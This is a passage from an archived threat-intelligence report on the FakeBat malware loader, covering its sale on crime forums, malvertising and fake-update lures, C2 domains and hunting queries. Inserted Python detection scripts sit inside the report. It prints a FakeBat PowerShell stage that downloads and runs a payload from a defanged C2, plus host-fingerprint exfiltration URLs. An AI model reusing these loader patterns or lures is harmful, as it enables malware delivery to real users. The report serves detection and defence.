{
	"id": "615874bc-4413-4c5f-b29e-2602d06abdbc",
	"created_at": "2026-04-06T00:13:25.861879Z",
	"updated_at": "2026-04-10T03:35:52.820654Z",
	"deleted_at": null,
	"sha1_hash": "adc3bbd04b39dfd993f8483a7b6dacf2c4304a65",
	"title": "Exposing FakeBat loader: distribution methods and adversary infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2534639,
	"plain_text": "Exposing FakeBat loader: distribution methods and adversary\r\ninfrastructure\r\nBy Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2024-07-02 · Archived: 2026-04-05 14:30:07 UTC\r\nTable of contents\r\nContext\r\nInteractions on cybercrime forums\r\nFakeBat loader\r\nAssociated distribution service\r\nDifferent clusters distributing FakeBat\r\nMalvertising and software impersonation\r\nFake web browser updates\r\nSocial engineering schemes on social networks\r\nTracking adversaries infrastructure\r\nFakeBat C2 servers\r\nLanding pages impersonating popular software websites\r\nConclusion\r\nFakeBat IoCs \u0026 Technical details\r\nIoCs\r\nYARA rules\r\nExternal references\r\nContext\r\nOver the past few years, cybercriminals have increasingly used the drive-by download technique to distribute\r\nmalware via user web browsing. This technique mostly involves SEO-poisoning, malvertising, and code\r\ninjection into compromised websites to trick users into downloading fake software installers or browser\r\nupdates.\r\nThe drive-by download technique is commonly used by multiple intrusion sets to distribute loaders (e.g. FakeBat,\r\nBatLoader), botnets (e.g. IcedID, PikaBot), infostealers (e.g. Vidar, Lumma, Redline), post-exploitation\r\nframeworks (e.g. CobaltStrike, Sliver) and RATs (e.g. NetSupport), to name but a few. From our observations,\r\nsome of these attacks were conducted by Initial Access Brokers (IABs) and have led to the deployment of\r\nransomware (BlackCat, Royal).\r\nDuring the first semester of 2024, FakeBat (aka EugenLoader, PaykLoader) was one of the most widespread\r\nloaders using the drive-by download technique. 
FakeBat primarily aims to download and execute the next-stage\r\npayload, such as IcedID, Lumma, Redline, SmokeLoader, SectopRAT and Ursnif.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 1 of 19\n\nIn 2024, the Sekoia Threat Detection \u0026 Research (TDR) team discovered multiple FakeBat distribution campaigns.\r\nThese campaigns typically leverage landing pages impersonating legitimate software and are spread via\r\nmalvertising, fake web browser updates on compromised websites, and social engineering schemes on social\r\nnetworks. Additionally, TDR closely monitored the FakeBat C2 infrastructure to identify new C2 servers and\r\nchanges in FakeBat communications.\r\nThis FLINT aims to present the activities of the FakeBat operators on cybercrime forums, an analysis of\r\npreviously undocumented campaigns distributing FakeBat, technical details on its distribution campaigns\r\nand related C2 infrastructures. Additionally, TDR analysts share Indicators of Compromise (IoCs), YARA rules\r\nand tracking heuristics to monitor the FakeBat distribution and C2 infrastructures.\r\nInteractions on cybercrime forums\r\nFakeBat loader\r\nEmergence of FakeBat\r\nSince at least December 2022, the threat actor Eugenfest (aka Payk_34) has sold FakeBat as Loader-as-a-Service\r\non the Exploit forum.\r\nAs advertised by its representative, FakeBat is a loader malware in MSI format that offers “several anti-detection\r\nfeatures, such as bypassing the Unwanted Software Policy of Google and Windows Defender alerts and being\r\nprotected from VirusTotal”.\r\nBy purchasing this service, FakeBat customers have access to an administration panel that allows them to:\r\ngenerate FakeBat builds;\r\nmanage the distributed payloads;\r\nmonitor the installations related to the payload distribution.\r\nNotably, the Malware-as-a-Service (MaaS) provides build templates to trojanise legitimate software, thus luring\r\npotential victims\r\n
into executing FakeBat.\r\nThe FakeBat administration panel contains information related to the infected host, including the IP address,\r\ncountry, OS, web browser, mimicked software, and installation status. Customers can also write comments for\r\neach bot.\r\nSecond wave of advertising\r\nIn September 2023, FakeBat operators launched a new advertising campaign on cybercrime forums and Telegram\r\nchannels, introducing MSIX as a new format for their malware builds. Moreover, to bypass Microsoft\r\nSmartScreen security features, they signed the FakeBat installer with a valid code-signing certificate. The\r\nsignature is included in the MSIX format and is available as an extra in the MSI format.\r\nFigure 1. FakeBat (aka Payk Loader) advertisement on the XSS forum, published by Payk_34 on 2\r\nSeptember 2023\r\nIt is noteworthy that the threat actor started using the new handle Payk_34 on the XSS forum and Telegram.\r\nPayk_34 is allegedly the administrator of the “Payk Loader”, for which they possibly provide support through the\r\nTelegram account spektr.\r\nIn September 2023, FakeBat was sold for $1,000 per week and $2,500 per month for the MSI format, $1,500 per\r\nweek and $4,000 per month for the MSIX format, and $1,800 per week and $5,000 per month for the MSI +\r\nSignature package.\r\nAccording to the operators’ publication on the associated Telegram channel, the MaaS has a limited number of\r\ncustomers:\r\nMSI – not available yet due to ongoing issues with Windows Defender.\r\nThere are still seats available on MSIX, but at this rate, they will soon run out.\r\n(translated from Russian) Payk_34’s publication indicating a “seat” number restriction related to\r\nits MaaS program, on 12 October 2023\r\nSuch a limitation is common for MaaS offerings, particularly for loaders, crypters or botnets, since malware\r\noperators aim to\r\n
control distribution. Restricting the number of customers helps them manage support more\r\neffectively, limit the spread of the malware, and reduce the likelihood of detection by antivirus solutions.\r\nAssociated distribution service\r\nIn addition to the FakeBat MaaS, in September 2023, Payk_34 advertised an additional distribution service,\r\ncentred around FakeBat and landing pages:\r\nWe also offer an additional service for project implementation; it includes:\r\n– Checking for all possible alerts.\r\n– Managing integrations for the landing pages.\r\n– Monitoring loader builds and updating them when alerts appear.\r\n– Handling delivery.\r\n– Managing almost everything related to the delivery.\r\nThe service is negotiated individually with each client.\r\nCost: from $3000, excluding the loader itself. Pricing depends on the complexity of the project.\r\n(translated from Russian) Payk_34’s publication advertising the distribution service\r\nThe provided service is comparable to a personalised Pay-Per-Install (PPI) service, as the FakeBat operators monetise\r\nthe installation of malicious software by delivering it on behalf of their customers.\r\nDifferent clusters distributing FakeBat\r\nSekoia analysts identified several infection chains distributing FakeBat, likely corresponding to different MaaS\r\ncustomers. The analysis detailed in this section covers three distribution clusters: malvertising and software\r\nimpersonation, fake web browser updates, and social engineering schemes on social networks.\r\nMalvertising and software impersonation\r\nSince January 2024, TDR has monitored numerous FakeBat malvertising campaigns leveraging malicious\r\nwebsites that impersonate popular software.\r\n
Attackers use trusted advertising services, such as Google Ads, to\r\ndisplay these malicious websites at the top of search engine results when users search for software to download.\r\nThe malicious websites, also known as landing pages, are often copies of the official software homepages or\r\ndownload pages. They are typically hosted on typosquatting domain names. We observed FakeBat malvertising\r\ncampaigns targeting the following software:\r\n1Password\r\nAdvanced SystemCare\r\nAnyDesk\r\nBandicam\r\nBlender\r\nBraavos\r\nCisco Webex\r\nEpic Games\r\nGoogle Chrome\r\nInkscape\r\nMicrosoft OneNote\r\nMicrosoft Teams\r\nNotion\r\nOBS Studio\r\nOpenProject\r\nPlay WGT Golf\r\nPython\r\nShapr3D\r\nTodoist\r\nTradingView\r\nTrello\r\nVMware\r\nWebull\r\nWinRAR\r\nZoom\r\nList of software targeted by FakeBat malvertising campaigns\r\nThe list of targeted software mainly consists of popular productivity and business applications. By deploying infostealers,\r\nRATs or botnets on such targets, attackers can gain access to valuable accounts or systems, facilitating further\r\npost-compromise activities.\r\nThe download button on these malicious websites redirects the user to “/download/dwnl.php”, which subsequently\r\ndownloads from another domain a signed MSIX file corresponding to FakeBat.\r\nHere is an example of a FakeBat infection chain leveraging malvertising, observed by TDR on 30 May 2024:\r\n1. The website “hxxps://amydlesk[.]com/” displays a copy of the remote desktop software AnyDesk home\r\npage.\r\n2. The download button redirects to “hxxps://amydlesk[.]com/download/dwnl.php”.\r\n3. It downloads FakeBat from “hxxps://monkeybeta[.]com/build/AnyDesk-x86.msix” (MD5:\r\n4f2e138b6891395a408368a9a5998304).\r\n4.\r\n
Executing the MSIX file runs the PowerShell script “iiu.ps1”, which communicates with the\r\nFakeBat C2 server “hxxps://utr-jopass[.]com/buy/” and downloads the next-stage payload.\r\nFigure 2. Website impersonating and typosquatting AnyDesk to distribute FakeBat, as of 29 May\r\n2024\r\nFake web browser updates\r\nBy pivoting on the endpoint URL “/download/dwnl.php”, Sekoia analysts uncovered a large infrastructure of\r\nseveral hundred compromised websites distributing FakeBat through fake web browser updates.\r\nThese compromised websites are WordPress sites injected with malicious HTML and JavaScript designed to\r\nmislead users into thinking they need to update their Chrome browser because an exploit was detected. Clicking the\r\n“Update” button redirects the user to the FakeBat download. Additionally, users cannot interact with the original\r\nWordPress site, because the injected code keeps the fake browser update popup in the foreground and pushes them to\r\ndownload the fake update.\r\nThe main capabilities of the code injected into the compromised HTML page include:\r\nCreating a mask by setting the “aria-hidden” state to true, overlaying the rest of the original webpage, and\r\nfocusing user attention on the fake web browser update popup.\r\n
This is done in the HTML class “hustle-popup-mask hustle-optin-mask”.\r\nIncluding the JavaScript library jQuery with a comment written in Russian “Подключение jQuery”\r\n(translated as jQuery connection), in the HTML class “hustle-group-content”.\r\nCreating an HTML container positioned in the top-right corner of the webpage, in the HTML class “ad”.\r\nDisplaying the message “Warning Exploit Chrome Detect”, the Chrome browser logo, and the instruction\r\n“Update Chrome Browser”, in the HTML classes “top” and “content”.\r\nEmbedding JavaScript that redirects to the FakeBat download when the button is clicked, in the HTML\r\nclass “bottom”.\r\nAn example of the injected code is available in the following Gist:\r\nhttps://gist.github.com/qbourgue/e87d897c4f2f14bf715f432c2a2c1f28.\r\nFigure 3. Compromised website displaying a fake web browser update popup to distribute FakeBat\r\nUsing the PublicWWW search engine, as of June 2024, we identified more than 250 compromised websites\r\ninjected with malicious code redirecting visitors to download FakeBat:\r\n\"/download/dwnl.php\" \"hustle-popup-mask hustle-optin-mask\"\r\nA similar search on FOFA yields more than 120 allegedly compromised websites:\r\n\"/download/dwnl.php\" \u0026\u0026 \"hustle-popup-mask hustle-optin-mask\"\r\nWe believe that this number is underestimated, and it is likely that the infrastructure of compromised websites\r\nincludes several thousand WordPress sites.\r\nOf note, on 22 April 2024, eSentire TRU1 published a report on a campaign distributing FakeBat through fake\r\nbrowser updates by injecting JavaScript code into compromised websites.\r\n
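The PublicWWW and FOFA queries above find the injection at internet scale; the same markers can be checked locally on HTML saved from a suspect site. The following is an added example written for this edit, not code from the Sekoia post or from the injected pages: it parses the HTML, looks for the mask overlay classes, the lure text and a script redirect to /download/dwnl.php, and only reports a positive when all three are present. The two sample pages are constructed for the example, and brow-ser-update.example is a placeholder host, not an indicator from the post.

```python
# Added example for this edit, not code from the Sekoia post: local scan for the
# fake browser update injection markers the post describes.
from html.parser import HTMLParser

# Markers taken from the post's description of the injected code.
MASK_CLASSES = {'hustle-popup-mask', 'hustle-optin-mask'}
REDIRECT_PATH = '/download/dwnl.php'
LURE_TEXT = 'Warning Exploit Chrome Detect'


def quoted_strings(text):
    '''Yield every single- or double-quoted literal found in a script body.'''
    quotes = (chr(39), chr(34))
    i = 0
    while i < len(text):
        c = text[i]
        if c in quotes:
            j = text.find(c, i + 1)
            if j == -1:
                return
            yield text[i + 1:j]
            i = j + 1
        else:
            i += 1


class InjectionScanner(HTMLParser):
    '''Collects the signals that together indicate the injected popup.'''

    def __init__(self):
        super().__init__()
        self.mask_seen = False
        self.mask_aria_hidden = False
        self.lure_text = False
        self.redirect_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        classes = set((attrs.get('class') or '').split())
        if MASK_CLASSES <= classes:
            self.mask_seen = True
            if attrs.get('aria-hidden') == 'true':
                self.mask_aria_hidden = True
        if tag == 'script':
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if LURE_TEXT in data:
            self.lure_text = True
        if self._in_script:
            # script bodies arrive as raw data; pull any literal carrying the path
            for literal in quoted_strings(data):
                if REDIRECT_PATH in literal:
                    self.redirect_urls.append(literal)


def scan_html(html):
    '''Return the individual signals plus a combined verdict. Mask overlay,
    lure text and redirect must all be present for a positive.'''
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return {
        'mask': parser.mask_seen,
        'mask_aria_hidden': parser.mask_aria_hidden,
        'lure_text': parser.lure_text,
        'redirect_urls': parser.redirect_urls,
        'injected': parser.mask_seen and parser.lure_text and bool(parser.redirect_urls),
    }


# Constructed sample pages (not captured from a real site); the host is a placeholder.
INJECTED_SAMPLE = '''<html><body>
<h1>My WordPress blog</h1><p>Regular post content.</p>
<div class='hustle-popup-mask hustle-optin-mask' aria-hidden='true'></div>
<div class='ad'>
  <div class='top'>Warning Exploit Chrome Detect</div>
  <div class='content'>Update Chrome Browser</div>
  <div class='bottom'><button id='upd'>Update</button></div>
</div>
<script>
document.getElementById('upd').onclick = function () {
  window.location = 'https://brow-ser-update.example/download/dwnl.php';
};
</script>
</body></html>'''

CLEAN_SAMPLE = '''<html><body><h1>My WordPress blog</h1>
<p>Please update your plugins from the dashboard.</p></body></html>'''

if __name__ == '__main__':
    for name, page in (('injected', INJECTED_SAMPLE), ('clean', CLEAN_SAMPLE)):
        print(name, scan_html(page))
```

Requiring all three signals keeps a site that merely uses the Hustle plugin (whose class names the injection borrows) from being flagged on the mask alone; the extracted redirect URL is what you pivot on next.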
The cluster we identified during our\r\nrecent investigation appears to differ in the injected JavaScript code, the fake popup displayed and the payload\r\nhosting infrastructure.\r\nSocial engineering schemes on social networks\r\nOn 15 May 2024, we uncovered a campaign targeting the web3 community that distributed FakeBat disguised\r\nas a fake web3 chat application called getmess[.]io2.\r\nFor this campaign, attackers used a dedicated website, verified social media profiles, and promotional videos, all\r\nof which appeared legitimate. We assess with high confidence that cybercriminals mimicked the legitimate chat\r\nsolution beoble to create the new identity getmess and spread the FakeBat malware3.\r\nThis cluster also uses the endpoint “/download/dwnl.php” to redirect users to the FakeBat download.\r\nFigure 4. Fake web3 chat application to distribute FakeBat on 15 May 2024\r\nIt is interesting to note that only users invited to join GetMess were able to download the payload, as access to the\r\ndownload URL required an invitation code. TDR analysts believe this technique increases the trustworthiness of\r\nthe fake application and helps hide the final payload from bots and from the scrutiny of security\r\nresearchers.\r\nTo spread the malicious website and share invitation codes, attackers used allegedly compromised social network\r\naccounts. We identified profiles on X (formerly Twitter) and Telegram promoting it within web3 communities. It\r\nis highly likely that some Discord users were also targeted by this FakeBat campaign.\r\nThis social engineering phishing campaign employs techniques never seen before in association with FakeBat.\r\n
We\r\nbelieve that attackers targeted the web3 community to steal data from the most valuable accounts, such as those\r\nrelated to cryptocurrency wallets or NFT owners.\r\nTracking adversaries’ infrastructure\r\nFakeBat C2 servers\r\nThe fake software installers are MSIX packages containing directories and files, including a malicious PowerShell\r\nscript. In the June 2024 version of FakeBat, the initial PowerShell script is straightforward, downloading and\r\nexecuting the next-stage payload from its C2 server:\r\n\u0026{$zqpl='hxxps://utr-krubz[.]com/buy/';$zqplii='lkmns32Sf3lkn';$iiii=(iwr -Uri $zqpl -UserAgent $zqplii -UseBas\r\nIn addition to hosting payloads, FakeBat C2 servers highly likely filter traffic based on characteristics such as the\r\nUser-Agent value, the IP address, and the location. This enables the distribution of the malware to specific targets.\r\nSince December 2023, TDR analysts have been monitoring the FakeBat C2 infrastructure to identify C2 servers\r\nand observe changes. The following is an overview of the C2 infrastructure since August 2023.\r\nFrom August to December 2023\r\nFrom mid-August to December 2023, the FakeBat PowerShell script fingerprinted the infected host and exfiltrated\r\nthe data to its C2 servers on the URL endpoint “/” using the following HTTP query parameters: av, domain,\r\nkey, site, status and os.\r\nExamples of C2 URLs include:\r\nhxxp://clk-info[.]site/?status=install\r\nhxxp://clk-info[.]site/?status=start\u0026av=Windows%20Defender\r\nhxxps://3010cars[.]top/?status=start\u0026av=Names\u0026domain=$domain\u0026os=$urlEncodedOsCaption\r\nThe PowerShell scripts also download and execute an encrypted payload, most often masqueraded as .jpg or\r\n.targ.gpg files.\r\n
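The June 2024 initial script shown above keeps its C2 URL and User-Agent in plain single-quoted variables that are then passed to iwr. As an added example (not from the post and not Sekoia tooling), here is a small extractor for that script shape: it resolves the $name='literal' assignments, reads the -Uri and -UserAgent arguments of the iwr call, notes whether the response is handed to iex, and defangs the URL for reporting. The sample script is constructed in the same shape with a placeholder host (utr-sample.example) and made-up variable names and User-Agent; the heavily obfuscated template used between December 2023 and March 2024 would need deobfuscation before this works.

```python
# Added example for this edit, not code from the Sekoia post: pull the C2 URL
# and User-Agent out of the plain June 2024 initial-script shape shown above.
Q = chr(39)  # single quote character, kept in a name to avoid quoting noise

# Constructed sample in the same shape as the post's snippet, with a placeholder
# host (utr-sample.example) and made-up variable names and User-Agent string.
SAMPLE_SCRIPT = '''&{$qwe='https://utr-sample.example/buy/';$qweii='uaToken77';$r=(iwr -Uri $qwe -UserAgent $qweii -UseBasicParsing).Content;iex $r}'''


def parse_assignments(script):
    '''Map name -> value for every $name='literal' assignment in the script.'''
    out = {}
    i = 0
    while True:
        i = script.find('$', i)
        if i == -1:
            return out
        j = i + 1
        while j < len(script) and (script[j].isalnum() or script[j] == '_'):
            j += 1
        name = script[i + 1:j]
        if name and script.startswith('=' + Q, j):
            end = script.find(Q, j + 2)
            if end == -1:
                return out
            out[name] = script[j + 2:end]
            i = end + 1
        else:
            i = max(j, i + 1)


def extract_config(script):
    '''Return the download URL, the User-Agent and whether the response is
    executed, or None when no Invoke-WebRequest / iwr call is present.'''
    variables = parse_assignments(script)
    lowered = script.lower()
    start = -1
    for cmdlet in ('invoke-webrequest', 'iwr'):
        k = lowered.find(cmdlet + ' ')
        if k != -1:
            start = k + len(cmdlet)
            break
    if start == -1:
        return None
    # The argument list ends at the closing parenthesis, a pipe or a semicolon.
    stop = len(script)
    for ch in (')', '|', ';'):
        k = script.find(ch, start)
        if k != -1:
            stop = min(stop, k)
    tokens = script[start:stop].split()
    params = {}
    for idx, tok in enumerate(tokens):
        if not tok.startswith('-'):
            continue
        value = tokens[idx + 1] if idx + 1 < len(tokens) else ''
        if value.startswith('$'):
            params[tok[1:].lower()] = variables.get(value[1:], value)
        elif value.startswith(Q):
            params[tok[1:].lower()] = value.strip(Q)
        else:
            params[tok[1:].lower()] = True  # a switch such as -UseBasicParsing
    return {
        'c2_url': params.get('uri'),
        'user_agent': params.get('useragent'),
        'executes_response': 'iex ' in lowered or 'invoke-expression' in lowered,
    }


def defang(url):
    '''Render a URL so it cannot be clicked: https://a.b/x -> hxxps://a[.]b/x'''
    scheme, sep, rest = url.partition('://')
    host, slash, path = rest.partition('/')
    return scheme.replace('http', 'hxxp') + sep + host.replace('.', '[.]') + slash + path


if __name__ == '__main__':
    cfg = extract_config(SAMPLE_SCRIPT)
    print('C2:', defang(cfg['c2_url']), 'UA:', cfg['user_agent'], 'iex:', cfg['executes_response'])
```

The User-Agent value matters as much as the URL: the post notes that the C2 filters on it, so a replay without the exact string will get the empty filtered response rather than the payload.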
Most of the domain names hosting the next-stage payload were allegedly compromised.\r\nWe identified the following FakeBat C2 servers and hosting domain names, which we assess were not\r\ncompromised but are owned by the FakeBat operators:\r\n0212top[.]online\r\n0212top[.]site\r\n0212top[.]top\r\n0212top[.]xyz\r\n0909kses[.]top\r\n11234jkhfkujhs[.]online\r\n11234jkhfkujhs[.]site\r\n11234jkhfkujhs[.]top\r\n11234jkhfkujhs[.]xyz\r\n1212stars[.]online\r\n1212stars[.]site\r\n1212stars[.]top\r\n1212stars[.]xyz\r\n2311foreign[.]xyz\r\n2311forget[.]online\r\n2311forget[.]site\r\n2311forget[.]xyz\r\n2610asdkj[.]online\r\n2610asdkj[.]site\r\n2610asdkj[.]top\r\n2610asdkj[.]xyz\r\n2610kjhsda[.]online\r\n2610kjhsda[.]site\r\n2610kjhsda[.]top\r\n2610kjhsda[.]xyz\r\n3010cars[.]online\r\n3010cars[.]site\r\n3010cars[.]top\r\n3010cars[.]xyz\r\n3010offers[.]online\r\n3010offers[.]site\r\n3010offers[.]top\r\n3010offers[.]xyz\r\n343-ads-info[.]top\r\n364klhjsfsl[.]top\r\n465jsdlkd[.]top\r\n756-ads-info[.]site\r\n756-ads-info[.]top\r\n756-ads-info[.]xyz\r\n875jhrfks[.]top\r\n98762341tdgi[.]online\r\n98762341tdgi[.]site\r\n98762341tdgi[.]top\r\n98762341tdgi[.]xyz\r\n999-ads-info[.]top\r\nads-info[.]ru\r\nads-info[.]site\r\naipanelnew[.]ru\r\naipanelnew[.]site\r\ncdn-ads[.]ru\r\ncdn-ads[.]site\r\ncdn-dwnld[.]ru\r\ncdn-dwnld[.]site\r\ncdn-new-dwnl[.]ru\r\nclk-brom[.]ru\r\nclk-brom[.]site\r\nclk-brood[.]online\r\nclk-brood[.]top\r\nclk-info[.]ru\r\nclk-info[.]site\r\ncornbascet[.]ru\r\ncornbascet[.]site\r\ndns-inform[.]top\r\nfresh-prok[.]ru\r\nfresh-prok[.]site\r\nganalytics-api[.]com\r\ngotrustfear[.]ru\r\ngotrustfear[.]site\r\ninfocdn-111[.]online\r\ninfocdn-111[.]site\r\ninfocdn-111[.]xyz\r\nnew-prok[.]ru\r\nnew-prok[.]site\r\nnewtorpan[.]ru\r\nnewtorpan[.]site\r\nprkl-ads[.]ru\r\nprkl-ads[.]site\r\ntest-pn[.]ru\r\ntest-pn[.]site\r\ntopttr[.]com\r\ntrust-flare[.]ru\r\ntrust-flare[.]site\r\ntrustdwnl[.]ru\r\nIt is interesting to note that numerous domain names listed above were registered by a Belarusian organisation\r\nnamed “John Bolton”, based on Whois data.\r\nFrom December 2023 to March 2024\r\nIn mid-December 2023, FakeBat started using a heavily obfuscated template for its initial PowerShell script. At\r\nthis stage, it ceased to fingerprint the infected host and communicated with its C2 servers on a new URL endpoint:\r\n“/check.php”.\r\n
When the request was filtered, the C2 responded using the following HTTP headers:\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: REDACTED\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 0\r\nConnection: keep-alive\r\nWe identified the following FakeBat C2 servers matching the given configuration:\r\nads-analyze[.]online\r\nads-analyze[.]site\r\nads-analyze[.]top\r\nads-analyze[.]xyz\r\nads-change[.]online\r\nads-change[.]site\r\nads-change[.]top\r\nads-change[.]xyz\r\nads-creep[.]top\r\nads-creep[.]xyz\r\nads-eagle[.]top\r\nads-eagle[.]xyz\r\nads-forget[.]top\r\nads-hoop[.]top\r\nads-hoop[.]xyz\r\nads-moon[.]top\r\nads-moon[.]xyz\r\nads-pill[.]top\r\nads-pill[.]xyz\r\nads-star[.]online\r\nads-star[.]site\r\nads-star[.]top\r\nads-star[.]xyz\r\nads-strong[.]online\r\nads-strong[.]site\r\nads-strong[.]top\r\nads-strong[.]xyz\r\nads-tooth[.]top\r\nads-tooth[.]xyz\r\nads-work[.]site\r\nads-work[.]top\r\nads-work[.]xyz\r\nAll domains were hosted on 62.204.41[.]98 (AS59425, HORIZONMSK-AS) from 16 December 2023, until at\r\nleast 20 June 2024, at the time of writing.\r\n
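The three C2 conventions described in this section (the fingerprint beacon to / with av, domain, key, site, status and os keys; the /check.php endpoint answering with an empty body from nginx/1.18.0; and the /profile/, /profile1/ and /buy/ endpoints answering with an empty LiteSpeed response that has no Cache-Control header) can be turned into a single classifier for proxy or sandbox records. What follows is an added example written for this edit, not Sekoia tooling: it applies those rules to constructed records and returns the matches with the reasons. Hosts ending in .example are placeholders, not indicators. One assumption is flagged in a comment: the host-prefix list adds urd- to the prefixes in the post's Censys query, because urd-apdaps[.]com appears in the post's own C2 list.

```python
# Added example for this edit, not Sekoia's tooling: classify proxy records
# against the three FakeBat C2 conventions described in this section.
from urllib.parse import urlsplit, parse_qs

FINGERPRINT_KEYS = {'av', 'domain', 'key', 'site', 'status', 'os'}
PHASE_C_PATHS = {'/profile/', '/profile1/', '/buy/'}
# The post's Censys query lists cdn|udr|utd|utm|utr|usm; urd- is added here
# (an editorial assumption) because urd-apdaps[.]com is in the post's C2 list.
PHASE_C_HOST_PREFIXES = ('cdn-', 'udr-', 'urd-', 'utd-', 'utm-', 'utr-', 'usm-')


def classify_request(url, status, headers):
    '''Classify one request/response pair. headers is the response header map.
    Returns {'phase': label or None, 'host': hostname, 'reasons': [...]}.'''
    h = {k.lower(): str(v) for k, v in headers.items()}
    u = urlsplit(url)
    path = u.path or '/'
    params = set(parse_qs(u.query, keep_blank_values=True))
    reasons = []
    phase = None
    if path == '/' and 'status' in params and params <= FINGERPRINT_KEYS:
        # Aug-Dec 2023: fingerprint beacon using only the known query keys
        phase = 'aug-dec-2023 fingerprint beacon'
        reasons.append('query keys ' + ','.join(sorted(params)))
    elif (path == '/check.php' and h.get('content-length') == '0'
          and h.get('server', '').startswith('nginx/1.18.0')):
        # Dec 2023-Mar 2024: empty filtered reply from nginx/1.18.0 (Ubuntu)
        phase = 'dec-2023-mar-2024 check.php endpoint'
        reasons.append('empty nginx/1.18.0 response to /check.php')
    elif (path in PHASE_C_PATHS and h.get('server', '').lower() == 'litespeed'
          and h.get('content-length') == '0' and 'cache-control' not in h):
        # Mar-Jun 2024: LiteSpeed, empty body, no Cache-Control header
        phase = 'mar-jun-2024 profile/buy endpoint'
        reasons.append('empty LiteSpeed response without Cache-Control')
        if status == 503:
            reasons.append('503 filtered response')
        if (u.hostname or '').startswith(PHASE_C_HOST_PREFIXES):
            reasons.append('host prefix matches the cluster naming pattern')
    return {'phase': phase, 'host': u.hostname, 'reasons': reasons}


def triage_log(records):
    '''records: iterable of (url, status, headers). Returns only the matches,
    each tagged with its index in the input.'''
    hits = []
    for index, (url, status, headers) in enumerate(records):
        verdict = classify_request(url, status, headers)
        if verdict['phase']:
            verdict['index'] = index
            hits.append(verdict)
    return hits


# Constructed records; hosts ending in .example are placeholders, not IoCs.
SAMPLE_LOG = [
    ('http://clk-sample.example/?status=start&av=Windows%20Defender', 200,
     {'Server': 'nginx', 'Content-Type': 'text/html'}),
    ('http://ads-sample.example/check.php', 200,
     {'Server': 'nginx/1.18.0 (Ubuntu)', 'Content-Type': 'text/html; charset=UTF-8',
      'Content-Length': '0', 'Connection': 'keep-alive'}),
    ('https://utr-sample.example/buy/', 503,
     {'server': 'LiteSpeed', 'content-type': 'text/html; charset=UTF-8',
      'content-length': '0', 'Connection': 'Keep-Alive', 'Keep-Alive': 'timeout=5, max=100'}),
    # a real shop on LiteSpeed: Cache-Control is present, so it must not match
    ('https://shop.example/buy/', 200,
     {'server': 'LiteSpeed', 'content-length': '0', 'cache-control': 'no-store'}),
    # unrelated query key on the root path: must not match the beacon rule
    ('https://www.example/?q=status', 200, {'Server': 'nginx'}),
]

if __name__ == '__main__':
    for hit in triage_log(SAMPLE_LOG):
        print(hit['index'], hit['host'], hit['phase'], '; '.join(hit['reasons']))
```

The header-based rules are deliberately narrow (exact Server value, empty body, absent Cache-Control) because the paths alone are common on legitimate sites; treat a match as a pivot to confirm against the domain lists rather than as a verdict.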
Similarly to the previous period, these domain names were registered by\r\n“John Bolton”.\r\nFrom March to June 2024\r\nFrom the end of March to 20 June 2024, at the time of writing, the FakeBat initial PowerShell script communicated\r\nwith its C2 servers on the URL endpoints “/profile/”, “/profile1/”, and later “/buy/”, which responded using the\r\nfollowing HTTP headers:\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=100\r\ncontent-type: text/html; charset=UTF-8\r\ncontent-length: 0\r\ndate: REDACTED\r\nserver: LiteSpeed\r\nAt the time of writing, we identified the following FakeBat C2 servers matching this configuration:\r\ncdn-inform[.]com\r\nudr-offdips[.]com\r\nurd-apdaps[.]com\r\nusm-pontic[.]com\r\nutd-corts[.]com\r\nutd-forts[.]com\r\nutd-gochisu[.]com\r\nutd-horipsy[.]com\r\nutm-adrooz[.]com\r\nutm-adschuk[.]com\r\nutm-adsgoogle[.]com\r\nutm-adsname[.]com\r\nutm-advrez[.]com\r\nutm-drmka[.]com\r\nutm-fukap[.]com\r\nutm-msh[.]com\r\nutr-gavlup[.]com\r\nutr-jopass[.]com\r\nutr-krubz[.]com\r\nutr-provit[.]com\r\nTDR analysts actively track this C2 infrastructure using the following research queries:\r\nOn VirusTotal, based on the URL patterns and HTTP headers:\r\nentity:url ( exact_path:/profile/ OR exact_path:/profile1/ OR exact_path:/buy/ ) response_code:503\r\nheader_value:\"LiteSpeed\" NOT header:cache-control\r\nOn Censys, based on the domain name pattern and the Autonomous System (AS) reference:\r\nautonomous_system.asn={60117,59425} and name=/(cdn|udr|utd|utm|utr|usm)-.*/\r\nAll domains were hosted on either 185.198.59[.]26 or 194.36.191[.]196, both belonging to AS60117,\r\nHost Sailor Ltd.\r\nNotably, FakeBat operators anonymised the Whois records of the registered domain names for defence\r\nevasion.\r\nLanding pages impersonating popular software websites\r\nOver the past few years, cybercriminals have\r\n
increasingly used landing pages impersonating legitimate software\r\nwebsites in their distribution campaigns, masquerading their malware as legitimate installers.\r\nSince December 2022, TDR analysts have tracked adversaries’ infrastructure hosting these landing pages by\r\nproactively searching for copies of popular software websites hosted on unofficial domain names. While some\r\nof the results relate to FakeBat distribution campaigns, many others point to other distribution\r\nclusters, presented below.\r\nFor example, we track websites impersonating the popular note-taking application Notion using the following\r\nsearches:\r\nOn urlscan:\r\npage.title:\"Notion Desktop App for Mac \u0026 Windows\" NOT page.domain:notion.so\r\nOn Censys:\r\nservices:(http.response.html_title:\"Notion Desktop App for Mac \u0026 Windows\" and not\r\nhttp.request.uri:\"*notion.so*\")\r\nOver the last month, these heuristics have yielded the following domain names, which we consider malicious:\r\nfindreaders[.]com\r\nnoltlion[.]com\r\nnotilion[.]co\r\nnotilon[.]co\r\nnotion-loads[.]com\r\nnotion[.]findreaders[.]com\r\nnotion[.]help\r\nnotion[.]ilusofficial[.]com\r\nnotion[.]kyngsacademy[.]com\r\nnotion[.]li\r\nnotion[.]officespacesearchdc[.]com\r\nnotiorn[.]org\r\nnotiron[.]org\r\nnotliion[.]com\r\nnotlilon[.]co\r\nnotlon[.]top\r\nrabby[.]pro\r\nAmong these results, we assess with high confidence that seven of them 